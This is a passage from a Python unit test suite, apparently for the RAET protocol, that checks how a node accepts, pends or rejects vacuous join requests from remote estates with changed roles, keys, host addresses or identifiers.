console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
oldRole = 'beta'
newRole = 'beta_new'
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: New
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
beta.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert role/keys aren't touched
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousRejectedRejectNewKeys(self):
'''
Test joinent rejects vacuous join request with new keys from already rejected estate (B1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousRejectedRejectNewKeys.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
# Status: Rejected
alpha.keep.rejectRemote(alphaRemote)
# Ensure remote role is rejected
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Old
# Keys: New
beta.local.signer = nacling.Signer()
beta.local.priver = nacling.Privateer()
beta.dumpLocalRole()
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Join with new keys
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, don't clear
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote isn't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
# Assert role dump isn't changed
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousRejectedRejectNewRole(self):
'''
Test joinent rejects vacuous join request with new role from already rejected estate (B2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousRejectedRejectNewRole.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
# Status: Rejected
alpha.keep.rejectRemote(alphaRemote)
# Ensure remote role is rejected
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
oldRole = 'beta'
newRole = 'beta_new'
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: New
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
beta.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Join with a new role
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.role, newRole)
self.assertIn('joiner_rx_pend', beta.stats)
self.assertEqual(beta.stats['joiner_rx_pend'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
# Reject the new role
alpha.keep.rejectRemote(alphaRemote)
self.serviceStacks([alpha, beta])
# Action: Reject, don't clear
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.role, newRole)
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousRejectedRejectSameRoleKeys(self):
'''
Test joinent rejects vacuous join request with same role and keys but not sameall (C1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousRejectedRejectSameRoleKeys.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
# Status: Rejected
alpha.keep.rejectRemote(alphaRemote)
# Ensure remote role is rejected
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
self.assertIs(beta.main, None)
beta.main = True
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Old
# Keys: Old
# Sameness: sameRoleKeys, not sameAll
# Join with new main
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, clear remote data, don't touch role data
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert remote is cleared
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
# Assert role/keys aren't touched
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousRejectedRejectSameAll(self):
'''
Test joinent rejects vacuous join request with same all from already rejected estate (C2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousRejectedRejectSameAll.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
# Status: Rejected
alpha.keep.rejectRemote(alphaRemote)
# Ensure remote role is rejected
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Computed
# Fuid: Old
# Leid: 0
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: sameAll
# Join with a new role
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, clear remote data, don't touch role data
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert remote is cleared
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
# Assert role/keys aren't touched
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousEphemeralRejectedRejectSameall(self):
'''
Test joinent rejects vacuous ephemeral join from already rejected estate (C3)
'''
console.terse("{0}\n".format(self.testJoinentVacuousEphemeralRejectedRejectSameall.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
self.join(beta, alpha)
# Status: Rejected
alpha.keep.rejectRemote(alpha.remotes.values()[0])
self.serviceStacks([alpha, beta], duration=3.0)
# Ensure the next join would be ephemeral
self.assertIs(len(alpha.remotes), 0)
self.assertIs(len(alpha.nameRemotes), 0)
# Ensure remote role is rejected
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Mutable: Either (use Yes, as most loyal)
alpha.mutable = True
# Name: Body
# Main: Body
# Kind: Body
# RHA: Header
# Nuid: Computed
# Fuid: Header
# Leid: 0
# Reid: Header
# Role: Body
# Keys: Body
# Sameness: sameAll
alpha.clearStats()
beta.clearStats()
# Join with main = True
self.join(beta, alpha)
# Action: Reject, clear if Added
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 0)
self.assertEqual(len(stack.nameRemotes), 0)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('joinent_transaction_failure', alpha.stats.keys())
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats.keys())
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote is cleared
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
# Assert role/keys aren't touched
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptNewMain(self):
'''
Test joinent accept vacuous join with an updated main (D1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewMain.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
oldMain = None
newMain = True
# Name: Old
# Main: New
self.assertIs(beta.main, oldMain)
beta.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, None)
self.assertTrue(alpha.mutable)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.main, newMain)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptNewKind(self):
'''
Test joinent accept vacuous join with updated application kind (D2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
oldKind = None
newKind = 33
# Name: Old
# Main: Either
# Kind: New
self.assertIs(beta.kind, oldKind)
beta.kind = newKind
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, None)
self.assertTrue(alpha.mutable)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.kind, newKind)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptNewRha(self):
'''
Test joinent accept vacuous join with updated remote host address (D3)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewRha.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Yes
alpha.mutable = True
# Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
# beta connects with ha=('127.0.0.1', 7531)
oldHa = (beta.local.ha[0], 7532)
newHa = (beta.local.ha[0], beta.local.ha[1])
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=oldHa,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Appl: Either
# RHA: New: alpha remote ha is set to (127.0.0.1, 7532)
# new ha received from beta is (127.0.0.1, 7531)
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
self.assertEqual(alphaRemote.ha, oldHa)
self.assertEqual(beta.local.ha, newHa)
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, None)
self.assertTrue(alpha.mutable)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.ha, newHa)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptNewFuid(self):
'''
Test joinent accept vacuous join with an updated fuid (D4)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewFuid.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Simulate: alpha already know beta with fuid=33
# beta connects with a new fuid=newFuid
oldFuid = 33
newFuid = betaRemote.nuid
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=oldFuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: New: alphaRemote has uid=33 that is 'old', betaRemote has uid=2
# Leid: 0
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, None)
self.assertTrue(alpha.mutable)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.fuid, newFuid)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptNewKeys(self):
'''
Test joinent accept vacuous join with an updated keys (D5)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewKeys.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
